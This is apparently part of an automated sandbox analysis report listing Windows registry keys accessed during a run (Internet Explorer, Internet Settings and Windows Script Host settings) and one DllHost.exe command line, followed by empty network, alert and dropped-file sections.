HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
No results
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.